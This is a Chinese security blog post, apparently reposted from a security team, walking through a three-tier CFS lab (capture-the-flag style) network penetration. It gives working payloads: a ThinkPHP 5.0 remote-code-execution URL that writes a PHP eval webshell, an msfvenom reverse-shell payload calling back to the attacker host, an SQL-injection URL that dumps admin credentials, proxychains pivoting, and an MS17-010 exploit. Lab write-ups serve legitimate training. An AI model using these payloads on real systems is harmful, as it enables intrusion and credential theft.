CFS三层靶机内网渗透

admin 2022年4月1日11:11:43安全文章评论57 views4016字阅读13分23秒阅读模式

CFS三层靶机内网渗透

0x01 引言

CFS靶机就是三层靶机的内网渗透,通过一层一层的渗透,获取每个靶机的shell或flag,经常用于CTF比赛,不过这个靶机确实非常接近实战。

0x02 靶机配置

绘制一个CFS三层的拓扑图,kali虚拟机设置到桥接网络,攻击网段在172.16.111.0,三台靶机的配置分别如下图所示。

CFS三层靶机内网渗透

现在开始搭建靶机,虚拟机的网络布局如下图所示。


CFS三层靶机内网渗透


对靶机进行配置,kali直接配置到VMnet1桥接网络上就行。

target1的配置如下,网卡一桥接到外网,网卡二连接到192.168.22.0/24网段。


CFS三层靶机内网渗透


target2的配置如下,网卡一连接到192.168.22.0/24网段,网卡二连接到192.168.33.0/24网段。


CFS三层靶机内网渗透


target3的配置如下,网卡一直接连接到192.168.33.0/24网段。


CFS三层靶机内网渗透


这样配置完毕后,kali能ping通target1,target1能ping通target2,target2能ping通target3,三层内网搭建完成后,开始渗透之旅。

0x03 Target1

获取shell

使用namp对target1进行扫描端口;


CFS三层靶机内网渗透


访问一下80端口。


CFS三层靶机内网渗透

网站使用thinkphp搭建的,版本为5.0,想到该版本下有个命令执行漏洞,使用poc进行测试,返回phpinfo成功,该版本存在漏洞。

http://172.16.111.194/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1


CFS三层靶机内网渗透

直接使用poc写入shell文件。

http://172.16.111.194/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=system("echo '<?php @eval($_POST[1]);?>' > shell.php");


CFS三层靶机内网渗透


写入完成后,访问一下是否成功。


CFS三层靶机内网渗透


使用蚁剑连接,连接成功。


CFS三层靶机内网渗透

设置代理

制作后门传入target1

[email protected]:~# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=172.16.111.3 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >shell.elf


CFS三层靶机内网渗透


使用msf进行监听,执行shell查看查看网络配置,发现第二个网段,192.168.22.128/24

msf5 > msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcppayload => linux/x64/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 0.0.0.0 lhost => 0.0.0.0msf5 exploit(multi/handler) > set lport 6666 lport => 6666 msf5 exploit(multi/handler) > optionsmsf5 exploit(multi/handler) > runmeterpreter > shell


CFS三层靶机内网渗透


向msfconsole添加第二层路由:

run autoroute -s 192.168.22.0/24 run autoroute -p


CFS三层靶机内网渗透


利用msf进行第二层网络存活主机扫描:

msf5 exploit(multi/handler) > use auxiliary/scanner/discovery/arp_sweepmsf5 auxiliary(scanner/discovery/arp_sweep) > optionsmsf5 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.22.0/2msf5 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.22.0/24msf5 auxiliary(scanner/discovery/arp_sweep) > set threads 20msf5 auxiliary(scanner/discovery/arp_sweep) > run


CFS三层靶机内网渗透


扫描到192.168.22.128网段,在msf中添加代理,以便连接到target2。

msf5 exploit(multi/handler) > use auxiliary/server/socks4amsf5 auxiliary(server/socks4a) > set srvport 2222msf5 auxiliary(server/socks4a) > optionsmsf5 auxiliary(server/socks4a) > run


CFS三层靶机内网渗透


利用msf搭建socks代理,好让kali直接打第二层网络:


CFS三层靶机内网渗透


修改proxychains的配置文件;

vim /etc/proxychains.conf

添加sicks4 172.16.111.3 2222。


CFS三层靶机内网渗透


使用nmap进行扫描端口:

proxychains nmap -Pn -sT 192.168.22.128 -p1-1000



CFS三层靶机内网渗透

0x04 target2

获取shell

发现80端口,挂代理访问一下,访问成功,查看源码时,发现有提示注入点。


CFS三层靶机内网渗透


使用sqlmap进行注入。测试一下注入,加个单引号报错,为报错注入。


CFS三层靶机内网渗透


进行手工注入,报表名。


CFS三层靶机内网渗透


报出用户名密码解密得admin,123qwe,完整密码是这个 46f94c8de14fb36680850768ff1b7f2a,一开始没有报全,又改的后面的参数才报全的。

http://192.168.22.129/index.php?r=vul&keyword=1%20%27%20and%20updatexml(1,concat(0x7e,substr((select%20concat(username,0x7e,password)%20from%20bagecms.bage_admin),1,32),0x7e),1)--+


CFS三层靶机内网渗透


使用御剑扫描了一下目录,在tobots.txt找到后台页面。


CFS三层靶机内网渗透


直接在index.php写入一句话发现写入成功。


CFS三层靶机内网渗透


使用sockscap代理打开蚁剑连接shell。


CFS三层靶机内网渗透


成功拿取target2的shell。


CFS三层靶机内网渗透

设置代理

蚁剑中看到是linux64位系统,在msf上生成后门,并上传更改权限为777,使用msf连接。


CFS三层靶机内网渗透

0x05 target3

在MSF中开启EXP,与Target2建立连接,这里需要注意,上一次代理使用的reversetcp是MSF作为监听,让Target1连到我们,而这次代理使用的bindtcp是Target2作为监听,我们需要连到Target2。使用proxychains打开msf。

msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4444 -f elf -o test.elfuse exploit/multi/handlerset payload linux/x86/meterpreter/bind_tcpset lport 4444set rhost 192.168.22.129


CFS三层靶机内网渗透


扫描到192.168.33.0的网段。


CFS三层靶机内网渗透


添加网段。

meterpreter > run autoroute -s 192.168.33.0/24meterpreter > run autoroute -p


CFS三层靶机内网渗透


添加代理。


CFS三层靶机内网渗透


使用代理扫描端口。


CFS三层靶机内网渗透


扫描到445端口,使用永恒之蓝测试。

msf5 auxiliary(server/socks4a) > use exploit/windows/smb/ms17_010_PSEXECmsf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/bind_tcpmsf5 exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.33.129msf5 exploit(windows/smb/ms17_010_psexec) > optionsmsf5 exploit(windows/smb/ms17_010_psexec) > run


CFS三层靶机内网渗透

成功。到此靶机全部打通。

0x06 总结

现在三台靶机都已经拿到shell了,靶机中还有flag,有兴趣的小伙伴可以去试试找一找。

参考链接:https://www.anquanke.com/post/id/164525#h3-1

E

N

D



Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室。团队公众号自创建以来,共发布原创文章370余篇,自研平台达到26个,目有15个平台已开源。此外积极参加各类线上、线下CTF比赛并取得了优异的成绩。如有对安全行业感兴趣的小伙伴可以踊跃加入或关注我们

CFS三层靶机内网渗透


原文始发于微信公众号(Tide安全团队):CFS三层靶机内网渗透

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月1日11:11:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  CFS三层靶机内网渗透 http://cn-sec.com/archives/856297.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: